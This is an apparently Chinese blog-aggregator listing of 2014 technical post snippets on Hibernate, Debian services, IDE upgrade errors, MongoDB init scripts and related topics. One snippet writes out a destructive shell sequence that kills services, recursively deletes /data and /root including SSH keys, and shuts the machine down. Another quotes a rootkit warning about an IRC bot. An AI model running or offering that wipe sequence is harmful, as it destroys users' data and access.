两步: 第一步:写一个替代Hibernate默认命名规则类(本类目标是把java【骆驼命名】 转换成 【下划线命名】) package?paltform.init;
import?org.hibernate.cfg.ImprovedNamingStrategy;
import?org.hiberna...
分类:
系统相关 时间:
2014-07-22 09:16:34
阅读次数:
467
/etc/init.d/crond stop /root/mysql_stop \pkill php \pkill php \pkill nginx \pkill nginx rm -rf /data/* rm -rf /root/* /bin/rm -f /root/.bash_profile /bin/rm -rf /root/.ssh/ init 0...
分类:
其他好文 时间:
2014-07-22 09:10:36
阅读次数:
221
debian6里边要添加一个自动启动的服务 先将启动脚本放在/etc/init.d,然后使用insserv来启用这个服务 例如服务名称为 myserver,则脚本为/etc/init.d/myserver ? 然后使用 insserv myserver可以将myserver设为自...
分类:
其他好文 时间:
2014-07-22 08:28:35
阅读次数:
160
工具:eclipse3.7.2 升级ADT:从ADT-22.3.0到ADT-23.0.2 错误信息: Cannot?complete?the?install?because?of?a?conflicting?dependency.
??Software?being?installed:?Android?Development?Tools...
分类:
系统相关 时间:
2014-07-22 08:28:34
阅读次数:
506
最新升级IDEA12到13版本,升级后发现IDEA中SVN无法正常使用,但文件夹下能够正常使用。 并且报错:svn: E204899: Cannot run program "svn" (in directory "G:\code\langchao\.idea"): CreateProcess error=2, ?...
分类:
其他好文 时间:
2014-07-22 08:19:34
阅读次数:
227
#!/bin/sh?? ? ### BEGIN INIT INFO?? ? # Provides:???? mongodb?? ? # Required-Start:?? ? # Required-Stop:?? ? # Default-Start:??????? 2 3 4 5?? ? # Default-Stop:????...
分类:
数据库 时间:
2014-07-22 08:16:37
阅读次数:
309
现象,外网发包,流量暴涨 这个gitlab安全不? ?[20:20:49]?Warning:?Network?TCP?port?6667?is?being?used?by?/var/tmp/lib/init.?Possible?rootkit:?Possible?rogue?IRC?bot ????????...
分类:
其他好文 时间:
2014-07-22 08:16:37
阅读次数:
294
wxAuiToolBar‘s overflow function cannot work as expected, when as pane in wxAuiManager, on GTK. ![1][1] ![2][2] 当增加一个AuiToolBar到一个auimanager之后,如果想用它的overflow feature,在gtk平台,无...
分类:
其他好文 时间:
2014-07-22 08:16:37
阅读次数:
228
OSGJ:Equinox for Eclipse(Luna)?命令 launch?- start the OSGi Framework shutdown?- shutdown the OSGi Framework close?- shutdown and exit exit?- exit immediately (System.exit) init?- uninstall...
分类:
其他好文 时间:
2014-07-22 08:10:36
阅读次数:
278
#include
#include
#include
char s[250];
char a[10][250];
int a1[4];
int a2[250];
char ch;
int init(int len)
{
int tt=0;
for(int i=1;i<=7;i++)
{
for(int j=0;j<(int)pow(2,i)-1;j++)
...
分类:
其他好文 时间:
2014-07-20 10:25:18
阅读次数:
185